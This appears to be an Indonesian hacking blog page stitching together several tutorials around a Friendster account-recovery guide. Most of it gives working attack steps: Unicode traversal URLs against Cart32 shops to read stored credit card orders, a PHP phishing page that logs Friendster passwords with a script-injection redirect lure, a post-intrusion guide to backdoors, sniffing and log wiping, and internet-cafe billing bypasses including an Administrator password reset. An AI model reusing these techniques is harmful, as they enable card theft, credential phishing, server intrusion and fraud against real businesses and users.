rIcHeLLaSt

Bagaimana cara mendapatkan kembali account Friendster anda yang di Hack orang lain?
Pertama tama, anda bisa melaporkan hal ini kepada pihak friendster,

dengan mengirimkan email kepada help at friendster dot com

email tersebut berisikan pengaduan mengenai account anda yang di hack,
berikan mereka informasi yang selengkap lengkapnya, termasuk kronologisnya jika ada

sertakan info mengenai

User ID anda (email login)
Account ID (nomor)
Password sebelumnya
Bukti Identitas anda (KTP / SIM / PASSPORT)
Nama Depan Anda
Nama Belakang Anda
Email baru yang akan digunakan sebagai user login anda (jangan pernah
mensubmit email yang pernah digunakan untuk register di friendster)

gunakan email yang baru untuk mengirimkan email kepada friendster

Pihak friendster akan memverivikasi email anda, pengaduan anda, dan
jika diterima oleh mereka, account anda di Friendster akan di suspend,
lalu anda akan diberikan petunjuk selanjutnya (tergantung permintaan
mereka)

setelah itu, password dan user baru friendster, bisa dipergunakan kembali.

by: Rendy Maulana dot com

Pencurian nomor kartu
kredit di internet telah menjadi makanan sehari-hari komunitas hacker
baik di indonesia maupun di dunia. Salah satu cara yang paling banyak
di pakai adalah melalui kelemahan dari web site yang menyediakan
pembayaran online dengan credit card. Salah satu program yang sering
dipakai oleh web site yang memberikan layanan pembayaran online ini
adalah Cart32 yang paling banyak pula di bobol oleh hacker untuk
mendapatkan kartu kredit.

TUTORIAL I : Cart32 v3.5a

NB : Hanya bisa digunakan kepada beberapa situs yang memiliki kelemahan yang sama.

Langkah 1: Dapatkan terlebih dahulu Website Cart32 v3.5a
Langkah 2: Masuk ke website Cart32.exe
http://target/login/unicode/cart32.exe
(contoh : http://www.connectionsmall.com/scripts/cart32.exe/)
Langkah 3: Setelah kamu masuk kesana, akan diperlihatkan tampilan seperti dibawah ini :

========================================
Cart32 v3.5a Shopping Cart System for Windows
http://www.cart32.com/
Registered to Greymane Connections
License: Unlimited clients
©1996-2001 McMurtrey/Whitaker & Associates, Inc.
Build 714
========================================

Langkah 4: Sekarang yang harus kamu lakukan adalah memasukkan ekstensi berikut di
akhir URL, 98% memakai #1 & #2

a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)
b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\)
c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\) HANYA DIGUNAKAN KADANG2!

(contoh : http://www.connectionsmall.com/scripts /.%e0%80%af.. /..%e0%80%af.. /..%e0%80%af.. /winnt/system32/cmd.exe?/c+dir+c:\)

Langkah
5: Saat kamu berada di direktori utama (c:\), untuk masuk ke cc’s,
masukan kembali (\progra~1\MWAInc\Cart32\) ke akhir URL tadi sehingga
sekarang kamu dapat melihat seperti : http://www.connectionsmall.com
/scripts /.%e0%80%af.. /..%e0%80%af.. /..%e0%80%af../
winnt/system32/cmd.exe?/c+ dir+c:\progra~1\ mwainc\cart32\
Sekarang kamu dapat melihat banyak file seperti :

2814659000-001001.c32
2814659000-001002.c32
2814659000-001003.c32

Langkah 6: Copy salah satu dari nama file tersebut dan kemudian masukkan ke akhir URL, dan akan terlihat seperti :

http://www.connectionsmall.com/
scripts /.%e0%80%af../..%e0%80%af.. /..%e0%80%af../ winnt/system32
/cmd.exe?/c+type+ c:\progra~1\ mwainc\cart32\ 2814659000-001003.c32

Catatan : Diistu kamu akan melihat file lain yang berisi banyak sekali cc’s seperti :

RONACK-orders.txt (file ini tidak berada pada situs yang khusus ini)
procure-orders.txt (file ini tidak berada pada situs yang khusus ini)

Langkah 7: Sebelum kamu mengakses tipe file yang lain, pertama kamu harus mengganti
*c+dir+c:\* ke *c+type+c:\*

TUTORIAL II : Cart32 v3.5a

Target: http://www.partybows.com
1. Ke http://www.partybows.com
2. Klik http://www.partybows.com/seasonal.htm
3. Isi Quantity= 1
Pokoknya kayak lu pura2x beli dan klik order
4. Maka akan kesini jadinya :
https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem
5. Ubah menjadi
https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error
Cart32 v3.5 Error
CART32 Build 619
The following internal error has occurred: Invalid procedure Error Number = 5
Click Here For Possible Solutions
etc.
6. Cari log order-nya
Cart32 Setup Info and Directory
Mail Server = mail.axion.net
Section=Main
AdminDir = D:\secure\webroot\partybows\cgi-bin\cart32\
Jadi partybows-orders.txt
7. Sehingga akhirnya : http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt

TUTORIAL III : Cart32 v3.5a

search +/scripts/cart32.exe/
Exploitable Directories
-/scripts/cart32.exe/
-/scripts/cart32.exe/cart32clientlist
-/script/c32web.exe/ChangeAdminPassword
-/scripts/c32web.exe/
-/cgi-shl/c32web.exe/

Wherever
there is the cart32.exe add this to the end of it /cart32clientlist and
erase the rest a menu will come up with a submit box click go it will
list ALL clients and their passwords passwords will be encrypted after
decrypting the password, go to wherever the c32web.exe file is thats
the instructions with exploits what that channel we were just in
called!

Bye.. .

:: JoeGoeL ::.

Peringatan :
Segala
informasi yang dimuat di artikel ini hanyalah untuk digunakan sebagai
bahan referensi untuk tujuan pengetahuan saja. Informasi bukanlah
kejahatan. Mengetahui cara berbuat sesuatu *BUKANLAH* kejahatan.
Gunakan informasi ini untuk melindungi diri kamu sendiri. Tutorial ini
ditulis berdasarkan pengalaman gua selama menjelajahi dunia maya.
Dikumpulkan dari berbagai tutorial dan hasil ngobrol di #. Dan tulisan
ini di peruntukkan untuk para newbies. Buat yang udah para CARDER
tulen, kalo nich tutorial banyak kesalahan gua minta di kritik OK!

Mungkin anda tidak
menyadari bahwa yang sangat berbahaya adalah social engineering dan
untuk melakukannya anda tidak perlu menguasai ilmu yang tinggi.

Pada
dasarnya Social Engineering adalah sebuah seni untuk menjadikan
seseorang (yang dalam hal ini adalah sasaran orang yang hendak
dijadikan sebuah target eksperimen) untuk  sepenuhnya mempercayai atau
setidaknya memberikan sebuah ketertarikan kepada kita untuk share
tentang hal hal pribadi yang menyangkut privacy diri dia sendiri. Atau
dengan definisi klasik adalah sebuah performa psikologis untuk mencoba
mempengaruhi atau mencoba  mengidentifikasi sebuah masalah, baik secara
langsung ataupun tidak langsung.

Secara
langsung dapat diartikan secara sederhana dengan melihat seorang admin
menyalakan komputer dan kita secara ‘licik’ mencuri kombinasi keyboard
‘password’ mesin komputer tersebut, atau juga dengan menanyakan secara
langsung apa password yang dipakai oleh sysadmin tersayang. Dengan itu
terbuka sudah kesempatan kita berselancar di mesin orang dengan tanpa
beban.

Secara
tidak langsung adalah dengan mencoba atau mengira ngira apa password
yang digunakan  oleh sysadmin, atau dengan mencoba mencari apa yang
mungkin bagi sysadmin dalam menuliskan kombinasi keyboard untuk
menuliskan password. Hal ini akan sangat susah sekali bahkan boleh
dibilang mustahil untuk saat ini. Lalu konsep dasar psikologis hacking
diatas apakah masih sanggup dan memungkinkan dipakai untuk saat ini?
Jawaban yang mungkin dan realis adalah TIDAK! mengingat kondisi diatas
adalah hal yang imposible bagi kita yang hanya sebuah pengguna
fasilitas secara ilegal hehe
lalu bagaimana melakukan sebuah social engineering menggunakan logika
kita yang mungkin dalam angan kita sendiri kita sebagai seorang
ha(c)ker ‘dalam tanda kutip’?

Marilah
kita mencoba mendefinisikan bagaimana selayaknya kita berselancar
didalam server ‘ilegal’ kita dengan sebuah logika dan mungkin algoritma
‘without C ofcourse’ Anggap saja kita telah berhasil membobol sebuah
target *NIX dan kita sudah ada didalam server dengan autoritas root
tentunya hehe. Untuk awal sebaiknya kita kenali system target dengan
melakukan berbagi command untuk *NIX.

Exp:

Menuliskan
command simple uname untuk memudahkan kita mengetahui apa sih jenis
server yang kita akan jadikan sebuah objeck experiment. (Karena dengan
mengetahui jenis server anda akan menentukan langkah apa yang tepat
dalam berselancar)

[root@linux root]# uname
Linux

[root@linux root]# uname -a
Linux linux.merpati.co.id 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686
i386 GNU/Linux

[root@linux root]# cat /etc/issue
Red Hat Linux release 9 (Shrike)
Kernel \r on an \m

[root@linux root]#

Atau dengan melihat nama host sebuah server contoh:

[root@linux root]# hostname linux.merpati.co.id
[root@linux root]#

Sekarang
yang menjadi sebuah pertanyaan apabila sebuah command uname -a dan cat
/etc/issue tidak memberikan informasi server secara lengkap semisal

[root@linux root]# uname -a
Welcome to this server

Nah coba sebuah code simple yang ‘mungkin’ bermanfaat bagi anda dalam memulai  sebuah eksperimen kecil hehe.

/*
* Tool to show specs your machine
* Original code by Betha AS <scut@k-elektronik.org>
* Compile: (gcc = cc) gcc -o project project.c
* Coded at Dec 2002
* http://www.k-elektronik.org/
*/

#include
#include
#include
int main()

{
struct utsname name;
uname(&name);
printf("Machine identification: sysname=%s release=%s machine=%s\n",
name.sysname,
name.release, name.machine);
printf("sizeof(float, double, long double) = (%d, %d, %d)\n", sizeof(float), sizeof(double), sizeof(long double)); return 0; }
* EOF *

Anggap
saja kalian sudah paham dalam menggunakan sebuah code *C dan
selanjutnya apa dan bagaimana langkah yang tepat dalam mencoba social
engineering secara logika.

Pertama ceck apakah sang admin
tersayang login dalam server tersebut atau tidak. Kalau semisal masih
terdapat sysadmin login dan sedang menjalankan aktivitas lebih baik
anda sudahi dahulu eksperimen kecil anda dan tunggu sampai sysadmin
tersayang keluar dari server.

Kedua
adalah cek apakah server target anda sudah dimasuki oleh ‘ha(c)ker’ dan
apakah server target anda telah aman dari trojan dan rootkit yang
dipasang oleh sang intruder sebelum anda?

Baca beberapa referensi berikut untuk membuka wawasan anda dalam mengetahui konsep dasar sebuah rootkit dan trojan:

ftp://ftp.technotronic.com/unix/trojans/
http://packetstormsecurity.com/UNIX/penetration/rootkits/
http://www.digitaloffense.net/worms/

Beberapa tools untuk membersihkan rootkit (*trojans*)

http://www.chkrootkit.org/
http://WWW.ISTS.Dartmouth.edu/IRIA/knowledge_base/tools/ramenfind.htm
http://www.securiteam.com/tools/5JP0M1F40E.html
http://www.theorygroup.com/Archive/Unisog/2000/msg00123.html
http://archives.neohapsis.com/archives/ids/2000-q4/0166.html

Anggap
saja kalian udah berhasil membersihkan server anda dari trojan yang
dipasang oleh sang penyusup sebelum anda sendiri masuk kedalam sebuah
server.

Ketiga
adalah bagaimana mencoba masuk kedalam server target dengan menggunakan
magic password? atau setidaknya backdoor ‘inatan’ bagi script kiddies?
Kita dapat menggunakan beberapa referensi tool tentang backdoor:

http://beatbox.suidzer0.org/files.php?currentgrp=32
http://mcbethh.evil-packet.org/index.php?page=codez

Dan
sebagai catatan yang mungkin dilupakan oleh script kiddies adalah tanpa
terlebih dahulu memeriksa apakah sebuah backdoor yang hendak digunakan
telah bebas dari ‘backdoor’ yang mungkin akan segera mengirimkan
password ‘magic pass’ anda ke email sang author sendiri. Silahkan
telusuri sendiri dan coba analisa sebuah source code dengan pemahaman
logika dan lgoritma anda sendiri. Dan putuskan apakah anda akan mencoba
backdoor tanpa memeriksa terlebih dahulu atau anda mencoba merakit
backdoor sendiri yang tentunya tidak sesusah yang anda kira silahkan
baca referensi bagaimana merakit sebuah backdoor dengan edisi bahasa
Indonesia di http://www.k-elektronik.org/

Dan
yang ke empat adalah bagaimana mencoba mendapatkan password dijaringan
local anda dan bagaimana mengendus password sebuah root yang benar
benar password asli

http://naughty.monkey.org/~dugsong/dsniff/
http://www.sans.org/rr/paper.php?id=262
http://www.packetstormsecurity.nl/sniffers/ethersniff.c
http://ettercap.sourceforge.net/

Dan
yang terakhir amankan server anda dari sentuhan intruder lain yang
tidak puas akan ter ‘Take Overnya’ server oleh anda yang mungkin lebih
cerdas dari mereka. jangan lupa selalu bersihkan log yang tertinggal
baik menggunakan log remover atau secara manual. Jangan biasakan add
user didalam server ilegal anda dan menambahkan proses didalam
background yang membuat sang admin tersayang curiga akan keberadaan
anda dalam mencoba menemukan ‘real passwd’ si admin tersayang.

Semoga
sedikit pencerahan ini bermanfaat bagi yang ‘mau belajar’ Kritik dan
tanggapan atas artikel ini silahkan kirimkan email ke scut@kecoak.or.id
atau scut@k-elektronik.org

Salam hangat

Betha Aris S  aKa scut

<scut@k-elektronik.org>
<scut@kecoak.or.id>

Credit People:
logC,
CahCephoe, DeGleng, Fwerd (atas inspirasi dsniff), Ceyen. r3dshadow,
Cbug (atas inspirasi merakit BOOM) dan juga My Sweet Memories (doo)
thanks for all. JUga semua kawan kawan #k-elektronik #dhegleng atas
great experience yang ndak bisa aku sebut satu persatu Dan juga ’sebuah
perusahaan Indonesia’ atas percobaan servernya

CATATAN:

1. Penulis tidak bertanggung jawab akan penyalah gunaan artikel ini
2. Penulis hanya bertujuan memberikan wawasan untuk pengembangan ilmu
3. Penulis hanya mencoba memberikan ‘kewasapadaan’ sysadmin tersayang

Artikel ini dibuat oleh seorang newbie dan lamer bernama Blizbs_Uchiha
dan ditujukan oleh newbie2 laennya. Buat mas-mas dan om-om yang merasa
udah merasa pinter ato udah tau caranya sangat disarankan untuk tidak
usah membaca artikel ini karena hanya membuang2 waktu anda yang sangat
berharga.

Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin  billing warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing  Explorer(memang bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan
aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet
yang berbasis windows!!!

Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga
usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?

Ini dia caranya …
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat
windows dimulai adalah login screen client billing yang menutupi
seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya
ikut-ikutan di-disable untuk memaksa kita login melalui program billing
itu.
Sebenarnya saat kita menghadapi login screen itu komputer
sudah siap dijalankan. Hanya terhalang oleh screen login yang
menyebalkan itu. Naah… udah tau apa yang bakal saya jelasin ? Kalo
udah tau, brenti aja bacanya. Daripada mati kebosanan

Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan
jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin
window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan
ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi
yang perlu diperhatikan adalah progie yang anda gunakan harus bisa
show/hide window pake hotkey coz windows kita kan ditutupi sama login
screen sialan itu.

Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe  setengah isi disket.
    Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat

Langkah-langkahnya:

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong.  Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong  apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada,  cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z..  Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang
kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh.
Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen  yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk
tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.

Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu.  Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan  baca file readme yang disertakan bersama zhider

     CTRL+ALT+Z    Menyembunyikan jendela aktif
     CTRL+ALT+X    Menampilkan kembali semua jendela yang disembunyikan
     CTRL+ALT+L    Menampilkan dialog zhider
     CTRL+ALT+M    Menampilkan kembali semua jendela yang disembunyikan, dan juga  menutup zhider.

Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan  jahatmu tidak diridhai Tuhan
Kalo ketahuan langsung pertebal "muka bego"-mu. Misalnya bilang "Eh,
kok jadi gini ya? Kemaren ga gini kok." Ato kata-kata lain, tergantung
kreatifitas anda.

Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas penggunaan  artikel ini (Use at Your Own Risk). 

Thanx to:  ~ Allah swt ~ #yogyafree ~ #jasakom ~ #antihackerlink ~ W1ga5 ~ Blue  Spy ~ And all X-Code crew ~

Contact me:
     Yahoo ID    : blizbs_3690
     Frendzta’    : www.friendster.com/blizbs3690
     Homepage    : strife-leonhart.741.com (belom selesai)
     Irc        : co_jujur^^ @ #banjarmasin #yogyafree @ DAL.Net

Sekali lagi Artikel ini
hanya ditujukan bagi temen2 yg belum mengetahui teknik ini. Jika
temen2(terutama for 3133t) Sudah tahu teknik ini SAYA MOHON STOP!!
STOP!! STOP!! STOP!! STOP!! STOP!! tetapi bila anda tetap sja Ngotot
ingin meneruskan saya tidak bisa memaksa anda…

Lanjutt ….

Akhir-akhir
ini banyak yg membicarakannya, bahkan sedang menjadi berita hangat.
Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu. Sebagaimna
telah dijelaskan pada artikel sebelumnya (WuPz, jagonya dll).
Testimonial Redirect bisa jadi berabe bgt kalo disalah gunakan.
Artinya?? cara tersebut bisa digunain buat ngedapetin password,
cookies, or perhatian lebih dari doi ama kita ;)) n laen-laen .. .

So langsung saja kita menuju acara puncak …

Pertama-tama yg mesti kita siapin :

1. Teh manis penghangat malam.
2. Jangan Lupa cemilan yg bikin Kriuk .. kriuk …
3. Web Hosting yg support PHP. Cari di paman Google banyak..
4. Upload file index.htm (ada di source).

5. Sertakan code php dan JavaScript di bawah ini dan " SAVE As " sesuai dg nama link yg dituju pada Form Login.

        $email = $_POST[email];
    $password = $_POST[password];
    $fl = fopen(’password.txt’, ‘a’);
    fwrite($fl, "$email . $password \n\n");
    fclose($fl);

    ?>

   
    window.location=”http://www.friendster.com/index.php”;
    

    Dan upload file diatas ke www.webyangsupportphp.com

6.
Buat file Text kosong dengan nama Sesuai perintah Open pada php code di
atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.

7. kirim testi dg :

    hai syang .. gimna kabarna, kagen nie .. <script>window.location=" http://webyangsupportphp.com/index.htm";</script> kpn ke Jogja ..

 
nah .. Setelah sang pacar penerima testi membuka "New Testimonials",
maka sesuai dg perintah yang berada di JavaScript => window.location
<= yg disisipkan maka link akan menuju ke
http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa
sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!!
tanpa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan
dg rela hati mengisi Form login tipuan.
    Akhirnya dg pura-pura
tidak tahu, muka bego, sedikit bodoh. Si pengirim testi menawarkan
jasanya untuk sang pacar tercinta… =] )

 
Selain itu teknik diatas akan terlihat seperti aslinya jika
menggunakan " OVERLAY GENERATOR " pada profil fs pada saat pengiriman
testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif
menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm
maka pada saat pengiriman data akan menuju ke
http://webyangsupportphp.com/login.php

Kesimpulan :

# Hacking tidak selamanya menggunakan " TOOLS "
# Kelemahan XSS merupakan bahaya besar
# Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri !!!!

Thanks To :

Allah SWT
———
-V-i-e- My Queen

$Jasakom Community
$Aat Shadewa - thanks 4 your knowledge.
$Xcode Community
$h_iem_ura, daddy, otoy’s, rahmat-mh, n 2 friends that can’t be says one by one.
$komp butut gw!!

$$$ Knowledge is belongs to world $$$

Download

###numpang_lewat###

Sering kita ke warnet yang banyak mengunci berbagai akses seperti windows explorer tidak bisa dibuka,
klik kanan di desktop tidak bisa, klik kanan di folderpun tidak bisa…betapa sedihnyakan…
apalagi bagi saya yang telah terbiasa dengan shortcut windows xp, misalnya membuka windows explorer:
Win +E, membuka run: Win +R, mencari file di dalam harddisk Win +F, yang mana tombol Win terletak antara
tombol Ctrl dan tombol alt. ingin tahu caranya…nih silakan coba…
Sebenarnya
cara ini telah lama saya coba dan ternyata berhasil (praktek di
komputer sendiri dan beberapa warnet yang menggunakan billing explorer)
Mohon maaf kepada pembuat Billing Explorer…untuk tidak berpanjang
lebar langsung aja ya…

==> Pertama Buka GPEdit.msc dulu
caranya:
C:\Windows\System32\GPEdit.msc <– double Click

—————————————— start. ——————————————
————————————— GPEdit.msc —————————————

1. Jika Klik Kanan di Desktop tidak bisa
Masuk Ke GPEdit.msc
Masuk ke [User Configuration/Administrative Templates/Desktop]
- Disable (Hide and disable all items on the desktop)

Jika MyComputer tidak ada
- Disable (Remove My Computer icon on the Desktop)

2. Jika Ingin mengubah properties pada taskbar start menu
masuk ke [User Configuration/Administrative Templates/Start Menu and Taskbar]
- Disable (Prevent changes to Taskbar and Start Menu Settings)

Jika Menu Run tidak muncul
- Disable (Remove Run menu from Start Menu)

Jika menu pada taskbar saat klik kanan tidak muncul
- Disable (Remove access to the context menus for the taskbar)
3. Apabila Control Panel tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/Control Panel]
- Disable (Prohibit access to the Control Panel)

4. Jika Command Prompt tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/System]
- Disable (Prevent access to the command prompt)

Jika Registry Editor tidak bisa di akses
- Disable (Prevent access to registry editing tools)

5. Jika Task Manager tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/System/Ctrl+Alt+Del Options]
- Disable (Remove Task Manager)

6. Jika Folder Options pada Windows Explorer tidak muncul
Masuk ke [User Configuration/Administrative Templates/Windows Component/Windows Explorer]
- Disable (Remove these Folder Options menu item from the Tools menu)

Jika Windows Key tidak berfungsi
- Disable (Turn off Windows+X hotkeys)

————————————— GPEdit.msc —————————————
——————————————- end ——————————————–

==> Setelah GPEdit.msc terbuka baru buka Registry Tools
caranya:
C:\Windows\System32\regedit.exe <– double Click
— atau —
C:\Windows\regedit.exe <– double Click

—————————————— start. ——————————————
————————————— Regedit. —————————————

Regedit4

[HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD]
"loadvxd"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:00000000
"LinkResolveIgnoreLinkInfo"=dword:00000000
"NoFolderOptions"=dword:00000000
"ClearRecentDocsOnExit"=dword:00000000
"NoTrayContextMenu"=dword:00000000
"EnforceShellExtensionSecurity"=dword:00000000
"NoPrinterTabs"=dword:00000000
"NoDeletePrinter"=dword:00000000
"NoAddPrinter"=dword:00000000
"NoRun"=dword:00000000
"NoSetFolders"=dword:00000000
"NoSetTaskbar"=dword:00000000
"NoClose"=dword:00000000
"NoViewContextMenu"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
"NoDispScrSavPage"=dword:00000000
"NoDispAppearancePage"=dword:00000000
"NoDispSettingsPage"=dword:00000000
"NoAdminPage"=dword:00000000
"NoProfilePage"=dword:00000000
"NoDevMgrPage"=dword:00000000
"NoConfigPage"=dword:0000000
"NoFileSysPage"=dword:00000000
"NoDispCPL"=dword:00000000
"NoDispBackgroundPage"=dword:00000000
"NoVirtMemPage"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]
"NoFileSharingControl"=dword:00000000
"NoPrintSharingControl"=dword:00000000
"NoNetSetup"=dword:00000000
"NoNetSetupIDPage"=dword:00000000
"NoNetSetupSecurityPage"=dword:00000000
"NoEntireNetwork"=dword:00000000
"NoWorkgroupContents"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"NoRealMode"=dword:00000000
"Disable"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]
"NoHTMLWallPaper"=dword:00000000
"NoChangingWallPaper"=dword:00000000
"NoCloseDragDropBands"=dword:00000000
"NoMovingBands"=dword:00000000
"NoAddingComponents"=dword:00000000
"NoDeletingComponents"=dword:00000000
"NoEditingComponents"=dword:00000000
"NoClosingComponents"=dword:00000000

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000000

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableCMD"=dword:00000000
"DisableRegistryTools"=dword:00000000

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Advanced]
"Hidden"=dword:00000000
"HideFileExt"=dword:00000000
"ShowSuperHidden"=dword:00000000

————————————— Regedit. —————————————
——————————————- end ——————————————–

==> Setelah regedit.exe terbuka baru ubah password administrator <– (Ini yang di tunggu2x)
caranya:
C:\Windows\System32\compmgmt.msc <– double Click

—————————————— start. ——————————————
———————————— Administrator. ————————————-

Pilih: - Computer Management (Local)/System Tools/Local Users and Groups/User

- Klik kanan Administrator -> Set Password

- Ketik New Password: **********
Confirm Password: **********

Selesai deh!!!!!!!!!!!!!

———————————— Administrator. ————————————-
——————————————- end ——————————————–
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

———————————————————————————————
Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus

————————————— Bonus - Bonus —————————————

Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu
caranya:
- Masuk ke Folder misalnya: C:/Windows/System32
- Trus klik salah satu file dalam folder itu
misalnya: TaskMgr.exe
- Kemudian klik menu File pada Win Explorer
- Run as…
- Klik The following user -> Masukkan passwordnya
Username: Administrator
Password: ********
- Selesai
NB: Cara ini dilakukan jika kita sudah mendapatkan password administrator seperti yang telah
kita pelajari di atas. jika semua cara di atas masih ngga bisa jg berarti masih ada cara
lain silakan anda temukan sendiri, selamat mencoba

Contoh lain2nya dibawah ini………..

1. Membuka MSConfig dari Windows Explorer
Caranya:
C:\WINDOWS\pchealth\helpctr\binaries\MSConfig.exe

2. Membuka Sysedit dari Windows Explorer
Caranya:
C:\Windows\System32\Sysedit.exe

3. Membuka Task Manager
Caranya:
C:\Windows\System32\taskmgr.exe

4. Membuka Services.msc
Caranya:
C:\Windows\System32\services.msc

5. Membuka Disk Management System (Melihat Partisi Harddisk)
Caranya:
C:\Windows\System32\diskmgmt.msc

6. Membuka Computer Management Services
Caranya:
C:\Windows\System32\compmgmt.msc

7. Membuka Shortcut to desktop
Caranya:
C:\Windows\System32\Show Desktop

8. Membuka Defragment
Caranya
C:\Windows\System32\dfrg.msc

————————————— Bonus - Bonus —————————————

Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus
———————————————————————————————
Thanks to: Jasakom.Com and All community of hacker and cracker

Pada tutorial kali ini
akan lebih diajarkan/ditekankan bagaimana cara mendeface/redirect url
pada friendster dengan flash 8 utk windows…dan ini kompatibel dengan
friendster terbaru saat ini yang menggunakan comment bukan testimonial..

1.Langsung aja buka program macromedia flash 8…

2.Kemudian anda klik file-new-flash document…

3.jika sudah kemudian anda klik windows-actions

4.Jk sdh di jendela kode ny plh Action Script1.0&2.0

5.kemudian ketikkan kode sebagai berikut di jendela kodenya getURL("http://www.malionline.co.nr ");

6.Untuk
redirect profile ganti saja url nya dengan url yang anda
inginkan,sehingga misalnya url anda masukkan http://www.jasakom.com
maka ketika korban membuka profile-nya.langsung di alihkan ke
http://www.jasakom dalam beberapa detik…

7.Jika anda ingin
deface bisa juga,carnya bikin halaman deface,misal “Maaf Friendster
anda di hack.Hacked By Mali-Online”.kemudian save sebagai .html
kemudian upload ke hosting dan masukkan urlnya ke script di atas…

8.Kemudian
Save Script anda dalam format .swf dengan cara klik file-export-export
movie..sehingga formatnya menjadi .swf.misal dalam tutorial ini diberi
nama friendster3.swf

9.Kemudian Upload file friendster3.swf ini ke hosting anda baik yang gr bisa geocities,50webs,tapi saya lebih suka 50webs.com

10.Misal
dimasukkan ke 50webs.com sehingga url file friendster3.swf barusan
menjadi http://www.50webs.com/malialarm/friendster3.swf

11.Kemudian perhatikan kode dibawah ini

12.Ganti URL merah di atas dengan url kita tadi sehingga menjadi

13.Kirim Comment ke teman kita dengan isi

Piye..kabare mas..??

14.Karena
sekarang kebanyakan profile friendster mengapprove smua comment secara
otomatis,maka Otomatis ketika teman dan si korban membuka
profile/comment nya akan muncul tulisan atau URL yang kita
inginkan../jika tidak di approve maka teman tidak bisa melihat pending
commentnya..dan membuka situs/link yang kita inginkan

Terima kasih untuk
-ALLAH SWT
-MY PARENTS
-TEMAN2 KU DI ALARM 12 SEMUA..SEMOGA KALIAN SUKSES SEMUA..
Created by:@mali-online@

Oleh:mali-online.(M.Ali.Hardityan.F)

If you feel that joining social networking
services such as Friendster is a waste of time and provides little
privacy, you might want to delete your account so that no one can reach
your details but at the same time you’re wondering how you can do that.
It’s a little bit tricky to do that for the first time since Friendster
placed their ‘delete account’ button at hard-to-be-seen place and I
couldn’t find the instructions on that matter in their FAQ page either.
